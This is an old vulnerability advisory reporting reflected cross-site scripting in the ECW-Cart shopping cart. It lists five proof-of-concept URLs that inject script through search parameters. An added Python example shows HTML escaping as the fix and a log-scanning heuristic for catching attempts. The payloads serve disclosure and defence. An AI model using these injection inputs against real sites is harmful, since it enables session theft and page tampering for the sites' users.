by r0t,der4444,cembo,VietMafia

Thursday, December 15, 2005

ECW-Cart XSS vuln.

Vuln. discovered by: r0t
Date: 15 Dec. 2005
Vendor: www.soft4e.com/cart.html
Affected version: 2.03 and prior

Product Description:

ECW-Cart is an easy-to-use, full-featured shopping cart that can use an MS Excel or Access file as its database. Users can calculate a progressive discount for a chosen list of products and search by keywords and prices. The merchant prepares the list of products for online selling in MS Excel or Access, then uploads the prepared database to the web server via any FTP client. The admin can specify product groups, order features, and discounts for different order prices in the config file.

Vuln. Description:


ECW-Cart contains a flaw that allows a remote cross-site scripting attack. The flaw exists because input passed to the "kword", "max", "min", "comp" and "f" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Examples:

/index.cgi?c=search&s=ok&id=191&kword=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=&max=

/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=&max=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.
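What "properly sanitised" amounts to for these five parameters, as an added example in Python (not ECW-Cart's own code, which the page does not show). It assumes the search form echoes each submitted value back into the value attribute of an input field, which is the context the leading "> in the advisory's payloads is built to break out of; query_params, render_unsafe, render_safe, contains_injected_markup and suspicious_request are hypothetical helpers written for this example, and SAMPLE_URL is the advisory's first proof-of-concept URL.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The five reflected parameters named in the advisory.
REFLECTED = ("kword", "f", "comp", "min", "max")

# The advisory's first proof-of-concept URL (copied from the page; payload in kword).
SAMPLE_URL = ("/index.cgi?c=search&s=ok&id=191&kword="
              "%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E"
              "&f=r0t+XSS&comp=0&min=&max=")


def query_params(url):
    """Decode the query string into {name: first value}, keeping empty values."""
    qs = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def render_unsafe(params):
    """Assumed vulnerable layout: raw values pasted into value="..." attributes."""
    fields = ['<input name="%s" value="%s">' % (name, params.get(name, ""))
              for name in REFLECTED]
    return "<form>" + "".join(fields) + "</form>"


def render_safe(params):
    """Same layout, with every reflected value HTML-encoded for attribute context.

    quote=True is what matters here: it turns the payload's leading " into &quot;,
    so the attribute can no longer be closed early and the <script> tag never
    becomes markup.
    """
    fields = ['<input name="%s" value="%s">'
              % (name, html.escape(params.get(name, ""), quote=True))
              for name in REFLECTED]
    return "<form>" + "".join(fields) + "</form>"


def contains_injected_markup(rendered):
    """A raw <script tag in the rendered page means a value escaped its attribute."""
    return "<script" in rendered.lower()


def suspicious_request(url):
    """Log-review helper: names of reflected parameters whose decoded value carries
    the characters that make attribute break-out possible (constructed heuristic)."""
    params = query_params(url)
    return [name for name in REFLECTED
            if any(ch in params.get(name, "") for ch in '"<>')]


if __name__ == "__main__":
    params = query_params(SAMPLE_URL)
    print("decoded kword:", params["kword"])
    print("unsafe render injects markup:", contains_injected_markup(render_unsafe(params)))
    print("safe render injects markup:", contains_injected_markup(render_safe(params)))
    print("flagged parameters:", suspicious_request(SAMPLE_URL))
```

The encoding has to match the output context: html.escape without quote=True would still leave the double quote intact, and the attribute would be closed exactly as the advisory's payload intends. Running suspicious_request over decoded request URLs from the web server's access log is a cheap way to spot attempts against an unpatched install.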


PS: replace "r0t+XSS" with an existing parameter value.

Copyright (c) 2006 Pridels Sec Crew